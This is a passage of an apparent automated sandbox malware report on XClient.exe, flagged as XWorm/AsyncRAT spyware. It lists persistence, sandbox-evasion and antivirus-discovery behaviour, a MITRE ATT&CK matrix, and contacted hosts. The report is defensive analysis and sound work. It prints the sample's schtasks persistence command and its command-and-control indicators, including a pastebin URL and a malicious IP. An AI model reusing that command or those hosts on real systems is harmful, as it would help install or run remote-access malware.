              Source: XClient.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: XClient.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: XClient.exe, Messages.cs.Net Code: Memory
              Source: XClient.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: XClient.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: XClient.exe.0.dr, Messages.cs.Net Code: Memory
              Source: C:\Users\user\Desktop\XClient.exeCode function: 0_2_00007FFD9B8806A8 push ebx; retf 0_2_00007FFD9B8806EA
              Source: C:\Users\user\Desktop\XClient.exeCode function: 0_2_00007FFD9B8805FA push ebx; retf 0_2_00007FFD9B88060A
              Source: C:\Users\user\Desktop\XClient.exeCode function: 0_2_00007FFD9B8805F8 push ebx; retf 0_2_00007FFD9B88060A
              Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 3_2_00007FFD9B8B0604 push ebx; retf 3_2_00007FFD9B8B060A
              Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 3_2_00007FFD9B8B06D8 push ebx; retf 3_2_00007FFD9B8B06EA
              Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 7_2_00007FFD9B8905FA push ebx; retf 7_2_00007FFD9B89060A
              Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 7_2_00007FFD9B8906A8 push ebx; retf 7_2_00007FFD9B8906EA
              Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 9_2_00007FFD9B8B0604 push ebx; retf 9_2_00007FFD9B8B060A
              Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 9_2_00007FFD9B8B06D8 push ebx; retf 9_2_00007FFD9B8B06EA
              Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 10_2_00007FFD9B8A05FA push ebx; retf 10_2_00007FFD9B8A060A
              Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 10_2_00007FFD9B8A06D7 push ebx; retf 10_2_00007FFD9B8A06EA
              Source: C:\Users\user\Desktop\XClient.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Users\user\Desktop\XClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"
              Source: C:\Users\user\Desktop\XClient.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\XClient.exeMemory allocated: 750000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeMemory allocated: 1A580000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 11E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 1AD30000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 760000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 1A270000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 16D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 1B1B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 23D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 1A620000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\XClient.exeWindow / User API: threadDelayed 6106Jump to behavior
              Source: C:\Users\user\Desktop\XClient.exeWindow / User API: threadDelayed 3694Jump to behavior
              Source: C:\Users\user\Desktop\XClient.exe TID: 6532Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 5804Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3052Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3140Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 6596Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: XClient.exe, 00000000.00000002.4116138883.000000001B4F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\XClient.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"Jump to behavior
              Source: C:\Users\user\Desktop\XClient.exeQueries volume information: C:\Users\user\Desktop\XClient.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: XClient.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.XClient.exe.210000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.1658447422.0000000000212000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.4114219369.00000000025CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 6884, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: XClient.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.XClient.exe.210000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.1658447422.0000000000212000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.4114219369.00000000025CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 6884, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		1
              Input Capture              		1
              File and Directory Discovery              		Remote Services11
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		11
              Process Injection              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory13
              System Information Discovery              		Remote Desktop Protocol1
              Input Capture              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Registry Run Keys / Startup Folder              		1
              Scheduled Task/Job              		11
              Obfuscated Files or Information              		Security Account Manager1
              Query Registry              		SMB/Windows Admin Shares1
              Clipboard Data              		11
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
              Registry Run Keys / Startup Folder              		2
              Software Packing              		NTDS211
              Security Software Discovery              		Distributed Component Object ModelInput Capture1
              Non-Standard Port              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets1
              Process Discovery              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading              		Cached Domain Credentials131
              Virtualization/Sandbox Evasion              		VNCGUI Input Capture13
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
              Virtualization/Sandbox Evasion              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Process Injection              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              XClient.exe74%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
              XClient.exe68%VirustotalBrowse
              XClient.exe100%AviraTR/Spy.Gen
              XClient.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\XClient.exe100%AviraTR/Spy.Gen
              C:\Users\user\AppData\Roaming\XClient.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\XClient.exe74%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
              C:\Users\user\AppData\Roaming\XClient.exe68%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              pastebin.com
              		172.67.19.24
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://pastebin.com/raw/c8qJf1m5false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameXClient.exe, 00000000.00000002.4114219369.0000000002581000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    172.67.19.24
                    		pastebin.comUnited States
                    		13335CLOUDFLARENETUSfalse
                    87.120.125.47
                    		unknownBulgaria
                    		25206UNACS-AS-BG8000BurgasBGtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1583745
                    Start date and time:2025-01-03 14:06:04 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 42s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
